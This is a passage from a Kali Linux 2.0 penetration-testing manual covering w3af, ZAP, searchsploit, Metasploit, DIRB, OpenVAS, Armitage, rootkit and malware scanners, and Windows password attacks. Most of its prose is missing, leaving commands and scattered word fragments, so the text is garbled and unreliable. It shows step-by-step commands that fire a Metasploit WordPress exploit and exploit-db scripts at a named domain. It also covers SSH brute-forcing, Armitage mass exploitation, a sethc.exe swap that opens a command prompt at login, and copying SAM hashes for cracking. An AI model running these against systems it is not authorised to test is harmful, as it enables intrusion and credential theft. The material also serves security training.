2| w3af>>> plugins
3| w3af/plugins>>> help

WebWare.biz 245
Kali Linux 2.0

1| list
2|
3| back
4| exit w3af
5|
6| grep , grep
7| audit ,
8| evasion ,
9| crawl ,
10| auth ,
11| mangle ,
12| output ,
13| bruteforce ,
14| infrastructure ,

- .
Audit, crawl, infrastructure output.
audit, ,
xss, csrf, sql ldap ..
.
:
1| w3af/plugins>>> audit xss,csrf,sqli

:
1| w3af/plugins>>> audit all

- .
html.
crawl output:
1| w3af/plugins>>> crawl web_spider,pykto
2| w3af/plugins>>> infrastructure hmap
3| w3af/plugins>>> output console,html_file

:
Web_spider web-.
.

WebWare.biz 246
Kali Linux 2.0

Pykto nikto, python.


nikto (scan_database) .
Hmap -, ,
.
"Server".
hmap Dustin`a Lee.
Console .
Html_file HTML-.
:
1| w3af/plugins>>> back
2| w3af>>> start

, .
:
1| w3af>>> start
2| Auto-enabling plugin: discovery.allowedMethods
3| Auto-enabling plugin: discovery.error404page
4| Auto-enabling plugin: discovery.serverHeader
5| The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
6| Hmap plugin is starting. Fingerprinting may take a while.
7| The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
8| pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This
information was obtained by hmap plugin.
9| pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability
description: Directory indexing is enabled, it should only be enabled for specific directories
(if required). If indexing is not used, the /icons directory should be removed. The
vulnerability was found in the request with id 128.
10| pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description:
The /doc directory is browsable. This may be /usr/doc. The vulnerability was found in the
request with id 1865.
11| pykto plugin found a vulnerability at URL: http://localhost/\> . Vulnerability description:
The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-
2000-02. The vulnerability was found in the request with id 3385.
12| New URL found by discovery: http://localhost/
13| New URL found by discovery: http://localhost/test2.html
14| New URL found by discovery: http://localhost/xst2.html
15| New URL found by discovery: http://localhost/xst.html
16| New URL found by discovery: http://localhost/test.html

WebWare.biz 247
Kali Linux 2.0

, results.html:

40. ZAProxy:
-
OWASP Zed Attack Proxy (ZAP)
-
.
,
,
.
.
ZAP:

AJAX




SSL
(Smartcard Client
Digital Certificates)
-

REST API

WebWare.biz 248
Kali Linux 2.0


ZAP:

-
( Java 1.7)
( Pro )





ZAProxy
.
1| zaproxy

. .

( )

,
. ,
: ( SQL-
XSS). .

WebWare.biz 249
Kali Linux 2.0

,
"":


, , .

41. Metasploit Framework Kali Linux 2.0


Kali Linux 2.0
- https://www.kali.org/releases/kali-linux-20-
released/

Black Hat DEF CON,
Kali Linux Dojo, .
, Dojo
Kali 2.0 ISO .
.
Kali 2013. , Kali 2.0 .
Kali 2.0? 4.0, Debian Jessie,
,
(gnome, kde, xfce, mate, e17, lxde, i3wm),
.
,
. ?
, .
Kali Linux -
, -, ( ).

WebWare.biz 250
Kali Linux 2.0

, Kali 2.0
, Kali
. , Debian
Testing ( , )
Kali,
Debian, .
, Debian
Debian, .
,

, ,
( git).
,
. ,
.
,
-.
Kali Linux 2.0
Live Build, Kali 2.0 KDE,
GNOME3, Xfce, MATE, e17, lxde i3wm. GNOME 3 ,
.
GNOME 3,
. ,
, gnome.
,
GNOME 768 MB. ,
.
Kali 2.0 ISO. Kali
Xfce
.
Kali Linux 2.0 ARM NetHunter 2.0
ARM Kali 2.0 Raspberry Pi,
Chromebooks, Odroids !
, Chromebook Flip
. , .
, ARM
.

WebWare.biz 251
Kali Linux 2.0

NetHunter,
, Kali 2.0.
NetHunter 5, 6, 7, 9 10. OnePlus
One NetHunter Kali 2.0,
CM12 Offensive Security NetHunter
.
VMware VirtualBox
Offensive Security,
, Kali Linux,
VMware VirtualBox Kali 2.0 , Kali
. 32 64
Kali GNOME 3.

,
,
.
TL;DR. Kali 2.0?
Kali 1.0 , Kali 2.0

. , Kali Linux 2.0

Kali Linux 2.0, .
, Kali Linux !
TL; DR. Kali 2.0?
, Kali 1.x Kali 2.0!
source.list dist-upgrade .
Kali
Kali apt, Kali
2.0 . lazykali.sh, PTF
git . .
, ,
. - ,
.

WebWare.biz 252
Kali Linux 2.0

:
1| cat << EOF > /etc/apt/sources.list
2| deb http://http.kali.org/kali sana main non-free contrib
3| deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
4| EOF
5|
6| apt-get update
7| apt-get dist-upgrade # 10.
8| reboot

Metasploit Community / Pro Kali


Rapid7, Metasploit Community / Pro Kali Linux
metasploit-framework. ,
Community Pro, Rapid7,
, .
, Rapid7 Metasploit Kali,

() ,
, Metasploit
, Kali
metasploit-framework. ,
Metasploit.
, Metasploit Framework
Kali.
Metasploit Framework Kali Linux 2.0
- metasploit-framework,
, Metasploit Kali ,
metasploit. Metasploit Framework
Kali Linux 2.0:
1| # Postgresql Database
2| /etc/init.d/postgresql start
3|
4| # Metasploit Framework
5| msfdb init
6|
7| # msfconsole
8| msfconsole

WebWare.biz 253
Kali Linux 2.0

Kali 2.0 ,
Kali Linux 2.0 ,
. , ,
.
Kali 2.0:

WebWare.biz 254
Kali Linux 2.0

WebWare.biz 255
Kali Linux 2.0

42. Metasploit Framework Kali Linux 1.1


Metasploit Exploitation Framework
. ,
Metasploit. Metasploit,
.
searchsploit . ,
, , Metasploit.
.
, . ,
, ,
,
.
, , .
Kali Linux . , ,
:
Metasploit Framework Kali Linux
Kali Linux:

Kali Linux, ,
Linux.
searchsploit
.
, :
1| searchsploit -h

WebWare.biz 256
Kali Linux 2.0

5 :
-c .
-v , .
, .
searchsploit ( ), :
1| searchsploit phpmyadmin

WebWare.biz 257
Kali Linux 2.0

1| searchsploit wordpress

, . ( ),
, . .
: : .c, .pl, .txt,
.sh, .php, .rb, .py, .zip, .java, .asm, .htm .
.txt
. , , :

WebWare.biz 258
Kali Linux 2.0

, , ,
. .

.rb Ruby, :
ruby + + .
:
1| ruby /usr/share/exploitdb/platforms/php/webapps/28126.rb

WebWare.biz 259
Kali Linux 2.0

.rb Metasploit.
-, :
1| require 'msf/core'
Metasploit

.c .
.php . Ruby
, PHP
(
, ).
:
1| php /usr/share/exploitdb/platforms/php/webapps/35413.php webware.biz Alexey 50

.pl Perl, , ,
perl. ( )
PHP.
, .
. Metasploit.
Metasploit
Metasploit .
10 . Metasploit
Framework. - , :

WebWare.biz 260
Kali Linux 2.0

- ,
. :
1| msf > db_rebuild_cache

search + + . :
1| msf > search wordpress

WebWare.biz 261
Kali Linux 2.0

, , .
: ,
, ( ),
.
, WordPress , . .
.
, , :
1| exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent WordPress
Download Manager (download-manager) Unauthenticated File Upload

exploit/unix/webapp/wp_downloadmanager_upload
use :
1| msf > use exploit/unix/webapp/wp_downloadmanager_upload
, :

:
1| show options
( ).

WebWare.biz 262
Kali Linux 2.0

, .
set
:
1| set RHOST webware.biz

.
TARGETURI. , , phpMyAdmin,
phpmyadmin ,
.
:
1| exploit

, .

WebWare.biz 263
Kali Linux 2.0

, , ,
, . .
nmap. :
1| msf > nmap 10.0.2.2

1| msf > nmap webware.biz

WebWare.biz 264
Kali Linux 2.0

, , , ,
.
" Kali Linux 1.0.9a. 2.
".

, :
- (phpMyAdmin, WordPress, Drupal . .)
.
. ,
-. ,
.
- , : )
, , ; )
, ,
.

43. DIRB: -
Kali.Tools
-
( , ,
-). , - ,
- ,
..
DIRB -. (, ) -
. , -
.
DIRB
, .
DIRB CGI , ,
, .
DIRB -.
. ,
-. DIRB -
, CGI . -
, .
,

DIRB
1| dirb <_> [<()_>] []

WebWare.biz 265
Kali Linux 2.0

<_> : URL . ( -resume


)
<()_> : . (1,2,3)
DIRB
'n' -> .
'q' -> . ( )
'r' -> Remaining scan stats.
DIRB
-a <_> : USER_AGENT.
-c <_> : HTTP .
-f : NOT_FOUND (404).
-H <_> : HTTP .
-i : .
-l : "Location" .
-N <nf_code>: HTTP .
-o <__> : .
-p <[:]> : . ( 1080)
-P <proxy_username:proxy_password> : .
-r : .
-R : . ( )
-S : . . ( )
-t : '/' URL.
-u <:> : HTTP .
-v : NOT_FOUND.
-w : WARNING.
-X <> / -x <_> :
.
-z <> : , ,
.
DIRB
dirb http://url/directory/ ( )
dirb http://url/ -X .html ( '.html')
dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt (
apache.txt)
dirb https://secure_url/ ( SSL)
WebWare.biz 266
Kali Linux 2.0

DIRB
1| root@WebWare:~# tree /usr/share/wordlists/dirb*
2| /usr/share/wordlists/dirb
3| big.txt
4| catala.txt
5| common.txt
6| euskera.txt
7| extensions_common.txt
8| indexes.txt
9| mutations_common.txt
10| others
11| best1050.txt
12| best110.txt
13| best15.txt
14| names.txt
15| small.txt
16| spanish.txt
17| stress
18| alphanum_case_extra.txt
19| alphanum_case.txt
20| char.txt
21| doble_uri_hex.txt
22| test_ext.txt
23| unicode.txt
24| uri_hex.txt
25| vulns
26| apache.txt
27| axis.txt
28| cgis.txt
29| coldfusion.txt
30| domino.txt
31| fatwire_pagenames.txt
32| fatwire.txt
33| frontpage.txt
34| hpsmh.txt

WebWare.biz 267
Kali Linux 2.0

35| hyperion.txt
36| iis.txt
37| iplanet.txt
38| jboss.txt
39| jersey.txt
40| jrun.txt
41| netware.txt
42| oracle.txt
43| ror.txt
44| sap.txt
45| sharepoint.txt
46| sunas.txt
47| tests.txt
48| tomcat.txt
49| vignette.txt
50| weblogic.txt
51| websphere.txt
52| /usr/share/wordlists/dirbuster
53| apache-user-enum-1.0.txt
54| apache-user-enum-2.0.txt
55| directories.jbrofuzz
56| directory-list-1.0.txt
57| directory-list-2.3-medium.txt
58| directory-list-2.3-small.txt
59| directory-list-lowercase-2.3-medium.txt
60| directory-list-lowercase-2.3-small.txt
61|
62| 3 directories, 54 files

DIRB



big.txt /usr/share/wordlists/dirb/big.txt 20469
catala.txt /usr/share/wordlists/dirb/catala.txt 161
common.txt /usr/share/wordlists/dirb/common.txt 4614

WebWare.biz 268
Kali Linux 2.0




euskera.txt /usr/share/wordlists/dirb/euskera.txt 197
extensions_common.t
/usr/share/wordlists/dirb/extensions_common.txt 29
xt
indexes.txt /usr/share/wordlists/dirb/indexes.txt 10
mutations_common.t
/usr/share/wordlists/dirb/mutations_common.txt 49
xt

best1050.txt /usr/share/wordlists/dirb/others/best1050.txt 1049
1050

best110.txt /usr/share/wordlists/dirb/others/best110.txt 110
110

best15.txt /usr/share/wordlists/dirb/others/best15.txt 15
15
names.txt /usr/share/wordlists/dirb/others/names.txt 8607
small.txt /usr/share/wordlists/dirb/small.txt 959

spanish.txt /usr/share/wordlists/dirb/spanish.txt 449

alphanum_case_extra. /usr/share/wordlists/dirb/stress/alphanum_case_ex
95
txt tra.txt
alphanum_case.txt /usr/share/wordlists/dirb/stress/alphanum_case.txt 62
char.txt /usr/share/wordlists/dirb/stress/char.txt 26
doble_uri_hex.txt /usr/share/wordlists/dirb/stress/doble_uri_hex.txt 256
test_ext.txt /usr/share/wordlists/dirb/stress/test_ext.txt 17576
unicode.txt /usr/share/wordlists/dirb/stress/unicode.txt 65536
uri_hex.txt /usr/share/wordlists/dirb/stress/uri_hex.txt 256
apache.txt /usr/share/wordlists/dirb/vulns/apache.txt 30 Apache
axis.txt /usr/share/wordlists/dirb/vulns/axis.txt 17
cgis.txt /usr/share/wordlists/dirb/vulns/cgis.txt 3494
coldfusion.txt /usr/share/wordlists/dirb/vulns/coldfusion.txt 21
domino.txt /usr/share/wordlists/dirb/vulns/domino.txt 291
fatwire_pagenames.tx /usr/share/wordlists/dirb/vulns/fatwire_pagenames
2711
t .txt
fatwire.txt /usr/share/wordlists/dirb/vulns/fatwire.txt 101

WebWare.biz 269
Kali Linux 2.0




frontpage.txt /usr/share/wordlists/dirb/vulns/frontpage.txt 43
hpsmh.txt /usr/share/wordlists/dirb/vulns/hpsmh.txt 238
hyperion.txt /usr/share/wordlists/dirb/vulns/hyperion.txt 579
iis.txt /usr/share/wordlists/dirb/vulns/iis.txt 59 IIS
iplanet.txt /usr/share/wordlists/dirb/vulns/iplanet.txt 36
jboss.txt /usr/share/wordlists/dirb/vulns/jboss.txt 19
jersey.txt /usr/share/wordlists/dirb/vulns/jersey.txt 129
jrun.txt /usr/share/wordlists/dirb/vulns/jrun.txt 13
netware.txt /usr/share/wordlists/dirb/vulns/netware.txt 60
oracle.txt /usr/share/wordlists/dirb/vulns/oracle.txt 1075 Oracle
ror.txt /usr/share/wordlists/dirb/vulns/ror.txt 121
sap.txt /usr/share/wordlists/dirb/vulns/sap.txt 1111
sharepoint.txt /usr/share/wordlists/dirb/vulns/sharepoint.txt 1708
sunas.txt /usr/share/wordlists/dirb/vulns/sunas.txt 52
tests.txt /usr/share/wordlists/dirb/vulns/tests.txt 34
tomcat.txt /usr/share/wordlists/dirb/vulns/tomcat.txt 87 Tomcat
vignette.txt /usr/share/wordlists/dirb/vulns/vignette.txt 74
weblogic.txt /usr/share/wordlists/dirb/vulns/weblogic.txt 361
websphere.txt /usr/share/wordlists/dirb/vulns/websphere.txt 560


apache-user-enum- /usr/share/wordlists/dirbuster/apache-user-enum-
8930
1.0.txt 1.0.txt
Apache
1.0


apache-user-enum- /usr/share/wordlists/dirbuster/apache-user-enum-
10355
2.0.txt 2.0.txt
Apache
2.0
directories.jbrofuzz /usr/share/wordlists/dirbuster/directories.jbrofuzz 58688

directory-list-1.0.txt /usr/share/wordlists/dirbuster/directory-list-1.0.txt 141708


directory-list-2.3- /usr/share/wordlists/dirbuster/directory-list-2.3-
220560
medium.txt medium.txt

WebWare.biz 270
Kali Linux 2.0





directory-list-2.3- /usr/share/wordlists/dirbuster/directory-list-2.3-
87664
small.txt small.txt




directory-list-
/usr/share/wordlists/dirbuster/directory-list- ,
lowercase-2.3- 207643
lowercase-2.3-medium.txt
medium.txt






directory-list-
/usr/share/wordlists/dirbuster/directory-list- ,
lowercase-2.3- 81643
lowercase-2.3-small.txt
small.txt


44. Kali Linux


.
:

SQL- ( ,
,
)
(
SQL-,
)
Linux .
, , , , ,
DIRB .
. DIRB
DIRB: -.
:
1| dirb <_> [<()_>] []

. ,
.

WebWare.biz 271
Kali Linux 2.0

Windows AdminPage DW Admin and Login Finder v1.1 (


,
).
DIRB. ,
() .
1925 . .
. :
1| dirb http://example.com admin_webware2.txt

6.

45. OpenVAS 8.0
.

.
Kali Linux
OpenVAS 8.0 Kali Linux.
,
, OpenVAS 8.0 .
Kali
, , Kali
OpenVAS. , openvas-setup
OpenVAS, , admin
.
, .
1| root@kali:~# apt-get update
2| root@kali:~# apt-get dist-upgrade
3|
4| root@kali:~# apt-get install openvas
5| root@kali:~# openvas-setup
6| /var/lib/openvas/private/CA created
7| /var/lib/openvas/CA created
8|
9| [i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
10| [i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed
11| ...
12| sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
13| total size is 681654050 speedup is 1.00

WebWare.biz 272
Kali Linux 2.0

14| [i] Initializing scap database


15| [i] Updating CPEs
16| [i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
17| [i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
18| ...
19| Write out database with 1 new entries
20| Data Base Updated
21| Restarting Greenbone Security Assistant: gsad.
22| User created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.

, . - ,
. - ,
,
.
. openvas-setup , OpenVAS
manager, GSAD :
1| root@kali:~# netstat -antp
2| Active Internet connections (servers and established)
3| Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
4| tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9390/openvasmd
5| tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9391/openvassd: Wai
6| tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9392/gsad

WebWare.biz 273
Kali Linux 2.0

- OpenVAS
https://127.0.0.1:9392,
SSL admin.
. (
,
), .
:
1| openvasmd --get-users

:
1| openvasmd --user=admin --new-password=1

, admin, , ,
. , , .
:
1| openvasmd --create-user=mial

WebWare.biz 274
Kali Linux 2.0


:
1| openvas-start

! OpenVAS IP
, . !

46. Armitage:
Kali Linux
Armitage
Armitage , , Metasploit, Nmap.
Armitage -

.
Armitage .
: ,
(, , . .)
. ,
,
, . .
.. Armitage , . .
Armitage
Armitage, , .
:
3
Java 8.
Java 8 (JDK 8u45) . . :
openjdk Armitage
. , .
Armitage
PostgreSQL Metasploit
Kali 2.0
1| /etc/init.d/postgresql start && msfdb init

Kali 1.x
1| service postgresql start && service metasploit start

WebWare.biz 275
Kali Linux 2.0

Armitage:
1| armitage

.
, Metasploit.

, Connect.

Yes. .
, , , 2
. .
, .
WebWare.biz 276
Kali Linux 2.0

, ,
:

( , )

Armitage
IP . , IP
nmap:
1| nmap webware.biz

WebWare.biz 277
Kali Linux 2.0

webware.biz .

,
IP 185.26.122.50.
Armitage Hosts Add Hosts.
IP:

Scan.
, , .
.

WebWare.biz 278
Kali Linux 2.0

( , )

, Hosts Nmap Scan


Quick Scan (OS detect).
WebWare.biz 279
Kali Linux 2.0

.
Attacks Find Attacks.

( , )

Attack.
.
.. check exploits.

( , )
The target is not exploitable. ,
. This module does not support check. ,
. .. , .
:

WebWare.biz 280
Kali Linux 2.0

Attacks Hail Mary.


. ,
. , ,
.
Armitage Metasploit
Armitage Metasploit. ,
ssh, ftp, MySQL ,
. , . ,
login. . ,
SSH. auxiliary/scanner/ssh/ssh_login
:

WebWare.biz 281
Kali Linux 2.0

. , USER_FILE
. PASS_FILE
.
Metasploit
:
1| ls -l /usr/share/metasploit-framework/data/wordlists/

, Hydra ,
,

WebWare.biz 282
Kali Linux 2.0

Armitage ( )
Armitage Java : 1
. -
Java . Java ,
NetBeans, JDownloader, Vuse .
Metasploit (
+ )
Armitage .
Armitage,
Metasploit . .. -
,
- ,
, , .
: , ? !
,
, Armitage
.

47. Linux (rootkits)


rkhunter
(rootkit) ,
, .
,
, ,
, - .
Linux ,
.
Rootkit Hunter (rkhunter). ,
Linux rkhunter.
rkhunter Linux
rkhunter Debian, Ubuntu Linux Mint:
1| $ sudo apt-get install rkhunter

rkhunter Fedora:
1| $ sudo yum install rkhunter

rkhunter CentOS RHEL Repoforge


, yum:
1| $ sudo yum install rkhunter

WebWare.biz 283
Kali Linux 2.0

Linux

:
1| $ sudo rkhunter -c

rkhunter , , :
SHA-1
, .
, .
, , -
.
,
xinetd.
.
.
.
.
.
Rootkit Hunter .

WebWare.biz 284
Kali Linux 2.0

, rkhunter /var/log/rkhunter.log.
:
1| $ sudo grep Warning /var/log/rkhunter.log

1| [21:33:23] Checking /dev for suspicious file types [ Warning ]


2| [21:33:23] Warning: Suspicious file types found in /dev:
3| [21:33:23] Checking for hidden files and directories [ Warning ]
4| [21:33:23] Warning: Hidden directory found: '/etc/.java: directory '
5| [21:33:23] Warning: Hidden directory found: '/dev/.udev: directory '
6| [21:33:23] Warning: Hidden file found: /dev/.initramfs: symbolic link to `/run/initramfs'

Rootkit Hunter .
, , rkhunter "update".
,
wget:
1| $ sudo rkhunter --update

rkhunter cronjob "cronjob", rkhunter



/var/log/rkhunter.log .
, rkhunter ,
. , rkhunter
- ? -, ,
WebWare.biz 285
Kali Linux 2.0

. ,
,
. ,
, rkhunter
.
,
, ,
,
.
, , ,
,
. ,
- , , .

48. Linux
Linux 6 ?
. Shellshock, Heartbleed, Poodle, Ghost , ,
. - Linux,
. ? openVPN
? SSH ?
Linux. , ,
, .
Lynis. Lynis
. ,
.
Lynis.
Linux?
Lynis
.
.

. Lynis
,
. ,
.
Lynis:
1.
2.
3.

Lynis (, yum apt-get),


, Lynis.
.
WebWare.biz 286
Kali Linux 2.0

Lynis
, Lynis
.
. , ,

, .
Lynis, .
Red Hat: $ sudo yum install lynis
Debian: $ sudo apt-get install lynis
, , . !
?
Lynis
, .
( /usr/local/lynis)
Lynis ( ).
1| mial@mial-VirtualBox ~ $ sudo -s
2| [sudo] password for mial:
3| mial-VirtualBox ~ # mkdir /usr/local/lynis
4| mial-VirtualBox ~ # cd /usr/local/lynis/
5| mial-VirtualBox lynis #

Lynis
() Lynis (
lynis-1.6.4.tar.gz). wget (
). Mac OS curl, BSD
fetch.
1| mial-VirtualBox lynis # wget https://cisofy.com/files/lynis-1.6.4.tar.gz

WebWare.biz 287
Kali Linux 2.0

2| --2015-02-15 12:55:25-- https://cisofy.com/files/lynis-1.6.4.tar.gz


3| cisofy.com (cisofy.com) 149.210.134.182
4| cisofy.com (cisofy.com)|149.210.134.182|:443...
.
5| HTTP- . ... 200 OK
6| : 171953 (168K) [application/octet-stream]
7| : lynis-1.6.4.tar.gz
8|
9| 100%[======================================&amp;gt;] 171,953 168KB/s 1.0s
10|
11| 2015-02-15 12:55:29 (168 KB/s) - lynis-1.6.4.tar.gz [171953/171953]
12|
13| mial-VirtualBox lynis # sha256sum lynis-1.6.4.tar.gz
14| 886c74b591706f896149fe74adb481b58c549d32243d0cf620b46dfdd25dc66d lynis-
1.6.4.tar.gz
15| mial-VirtualBox lynis #

, , .
SHA1, SHA256 .
, sha1,
sha1sum, sha256sum openssl.

1| mial-VirtualBox lynis # sha1sum lynis-1.6.4.tar.gz


2| mial-VirtualBox lynis # sha1 lynis-1.6.4.tar.gz

WebWare.biz 288
Kali Linux 2.0

3| mial-VirtualBox lynis # openssl sha1 lynis-1.6.4.tar.gz


, -.
, ,
, .

lynis:
1| mial-VirtualBox lynis # tar zxvf lynis-1.6.4.tar.gz
2| mial-VirtualBox lynis # cd lynis/

Lynis
Lynis ,
:
1| mial-VirtualBox lynis # ./lynis --help
2|
3| [ Lynis 1.6.4 ]
4|
5| ##########################################################################
6| Lynis comes with ABSOLUTELY NO WARRANTY. This is free software, and you are
welcome to redistribute it under the terms of the GNU General Public License.
See the LICENSE file for details about using this software.
7|
8| Copyright 2007-2014 - CISOfy &amp; Michael Boelen, http://cisofy.com
Enterprise support and plugins available via CISOfy - http://cisofy.com

9| ##########################################################################
10|
11| [+] Initializing program
12| ------------------------------------
13| Scan options:
14| --auditor "&lt;name&gt;" : Auditor name
15| --check-all (-c) : Check system
16| --no-log : Don't create a log file
17| --pentest : Non-privileged scan (useful for pentest)
18| --profile &lt;profile&gt; : Scan the system with the given profile file

WebWare.biz 289
Kali Linux 2.0

19| --quick (-Q) : Quick mode, don't wait for user input
20| --tests "&lt;tests&gt;" : Run only tests defined by &lt;tests&gt;
21| --tests-category "&lt;category&gt;" : Run only tests defined by &lt;category&gt;
22|
23| Layout options:
24| --no-colors : Don't use colors in output
25| --quiet (-q) : No output, except warnings
26| --reverse-colors : Optimize color display for light backgrounds
27|
28| Misc options:
29| --check-update : Check for updates
30| --debug : Debug logging to screen
31| --view-manpage (--man) : View man page
32| --version (-V) : Display version number and quit
33|
34| Enterprise options:
35| --plugin-dir "&lt;path&gt;" : Define path of available plugins
36| --upload : Upload data to central node
37|
38| See man page and documentation for all available options.

Lynis
Linux Mint Lynis.
1| ./lynis --auditor "MiAl" -c -Q

WebWare.biz 290
Kali Linux 2.0

- PHP:
[+] Software: PHP

Checking PHP [ NOT FOUND ]


Checking PHP disabled functions [ NONE ]
include/tests_php php.ini.
:
1| mial-VirtualBox lynis # ./lynis -c
()
1| mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q
()
1| mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -Q -q
()
1| mial-VirtualBox lynis # ./lynis --auditor "WebWare.biz" -c -q -Q --pentest
( )
Lynis
Lynis /var/log/lynis.log. Lynis
Shellshock . , ,
.
-
. . Lynis .
/var/log/lynis.log
.

, Lynis ( ):
, Lynis .
.
GPLv3 .
.
,
. -
.

, :
HTML ( ).
.
CVE HTML .
WebWare.biz 291
Kali Linux 2.0

.
SQLi .
/.
, config/include .

, ,
. , Lynis
. , Linux, Windows Unix
. ,
. Lynis ,
,
( ) .

.
: Lynis
: http://cisofy.com/lynis/
:
: GPLv3
http://cisofy.com/downloads/
, , ,
, .

49. Linux Malware Detect (LMD) Linux


, , Linux,
, RHEL, CentOS, Fedora, Debian, Ubuntu, Mint.
, Apache
DOS , mod_security mod_evasive.
LMD (Linux Malware Detect).
Malware?
Malware () , ,

. (malware)
, , , ,
,
.
Linux Malware Detect (LMD)?
Linux Malware Detect (LMD) ,
Unix/Linux ,
GNU GPLv2. ,
. , ,

WebWare.biz 292
Kali Linux 2.0

, ,
, , //
.
Linux Malware Detect.
http://www.rfxn.com/projects/linux-malware-detect/.
Linux Malware Detect (LMD) RHEL, CentOS, Fedora, Debian,
Ubuntu, Mint.
1: Linux Malware Detect (LMD)
LMD, wget.
1| cd /tmp
2| wget http://www.rfxn.com/downloads/maldetect-current.tar.gz

2: LMD
LMD ,
.
1| tar xfz maldetect-current.tar.gz
2| cd maldetect-*
3| ./install.sh
, Debian, Ubuntu, Mint ( , sudo)
:
1| ./install.sh
:
1| sudo ./install.sh
, -.
:

WebWare.biz 293
Kali Linux 2.0

3: LMD
,
, , . ,
- , .
email_alert : ,
1.
email_subj : .
email_addr :
.
quar_hits : ,
1.
quar_clean : ,
1.
quar_susp : ,
, .
quar_susp_minuid : userid .
/usr/local/maldetect/conf.maldet
.
1| vi /usr/local/maldetect/conf.maldet


:
1| # [ EMAIL ALERTS ]
2| ##
3| # The default email alert toggle
4| # [0 = disabled, 1 = enabled]
5| email_alert=1
6|
7| # The subject line for email alerts
8| email_subj=" $(hostname)"
9|
10| # The destination addresses for email alerts
11| # [ values are comma (,) spaced ]
12| email_addr="alexey@webware.biz"
13|
14| # Ignore e-mail alerts for reports in which all hits have been cleaned.
15| # This is ideal on very busy servers where cleaned hits can drown out

WebWare.biz 294
Kali Linux 2.0

16| # other more actionable reports.


17| email_ignore_clean=0
18|
19| ##
20| # [ QUARANTINE OPTIONS ]
21| ##
22| # The default quarantine action for malware hits
23| # [0 = alert only, 1 = move to quarantine &amp; alert]
24| quar_hits=1
25|
26| # Try to clean string based malware injections
27| # [NOTE: quar_hits=1 required]
28| # [0 = disabled, 1 = clean]
29| quar_clean=1
30|
31| # The default suspend action for users wih hits
32| # Cpanel suspend or set shell /bin/false on non-Cpanel
33| # [NOTE: quar_hits=1 required]
34| # [0 = disabled, 1 = suspend account]
35| quar_susp=0
36| # minimum userid that can be suspended
37| quar_susp_minuid=500

4:
,
:
1| maldet --scan-all /home

, ,
, ,
:
1| # maldet --quarantine SCANID

:
1| # maldet --clean SCANID

WebWare.biz 295
Kali Linux 2.0

5:
LMD /etc/cron.daily/maldet,
, ,
. .
.
,
:
1| vi /etc/cron.daily/maldet

50. Windows?
Windows ( ),
, , .

Windows
.
ElcomSoft System
Recovery, ( ,
,
, - 1, 1111, 123, admin,
password, ).
Kali Linux.
, Kali Linux 1) Windows, 2)
,
.
, . 99.99%
, - .
, Live- (
Linux ). C:\Windows\System32\ cmd.exe
sethc.exe osk.exe. , sethc.exe (
osk.exe), cmd.exe .
sethc.exe, Windows,
, SHIFT, osk.exe,
.
(cmd.exe) :
1| net user _ *
.. admin, :
1| net user admin *

.
.

WebWare.biz 296
Kali Linux 2.0

Windows Kali Linux


: Windows ?
Windows SAM (System Account Management)
( ). ,
Active Directoryis. Active Directoryis ,
LDAP. SAM
C:\<systemroot>\System32\config\ (C:\<systemroot>\sys32\config\).
SAM , LM NTLM,
.
: .
,
SAM Windows .
SAM ( ),
- .
SAM C:\.
Linux, Kali, Live-.
SAM C:\<systemroot>\repair.
SAM .
, , ,
, .
expand. Expand [FILE] [DESTINATION].
SAM uncompressedSAM.
1| C:\> expand SAM uncompressedSAM

, Microsoft Windows 2000


SYSKEY. SYSKEY
SAM 128- ,
Windows.
Windows SYSKEY (
) :
1. (, Kali).
2. SAM SYSTEM (C:\<systemroot>\System32\config\
(C:\<systemroot>\sys32\config\)).
3. SYSTEM bkreg bkhive.
4. .
5. , John the Ripper.
. Windows
MAC (, ), .
,
( ) .

WebWare.biz 297
Kali Linux 2.0

Windows
Windows- SAM SYSKEY.
Windows
, , Microsoft
Windows .
fdisk -l .
Windows . fdisk NTFS
, :
1| Device Boot Start End Blocks Id System
2| /dev/hdb1* 1 2432 19535008+ 86 NTFS
3| /dev/hdb2 2433 2554 979965 82 Linux swap/Solaris
4| /dev/hdb3 2555 6202 29302560 83 Linux
:
1| mkdir /mnt/windows
Windows
:
1| mount -t <WindowsType> <Windows partition> /mnt/windows

, Windows ,
SAM SYSTEM :
1| cp SAM SYSTEM /pentest/passwords/AttackDirectory
SAM. PwDumpand Cain, Abel samdump
.
, SAM.
SAM. ,
SAM .
bkreg bkhiveare ,
, :

WebWare.biz 298
Kali Linux 2.0

Windows:
-, .
-. ,
. ( BIOS
,
).
,
VeraCrypt TrueCrypt (
, ).
Windows ,
, ,
( ) . .
.

7. 7. .
51.

, . :
:
(Kali Linux) ,
( -,
, -, ,
--, XSS ..);
: ,
,
, -, , DNS;
-: -
, -
.
, . ,
. PHP
Windows.
Windows
. ,
Kali Linux. Kali Linux
, Kali Windows
, .
Kali Linux
.
, .
- Windows
VirtualBox Kali Linux. ,

WebWare.biz 299
Kali Linux 2.0

,
. .
Kali Linux -
Windows
, Kali Linux .
: Windows-.
( , ..
DHCP), ,
( Kali).
Windows, Windows :
1| ipconfig
192.168.1.35 ( ,
).
: (C:\Server\bin\Apache24\conf\httpd.conf)
:
1| Listen 127.0.0.1:80
:
Listen *:80 ( , -
!);
Listen _IP_Windows:80 ();
:
1| Listen 192.168.1.35:80
, .
: .
NAT, . ,
, .

WebWare.biz 300
Kali Linux 2.0

: .
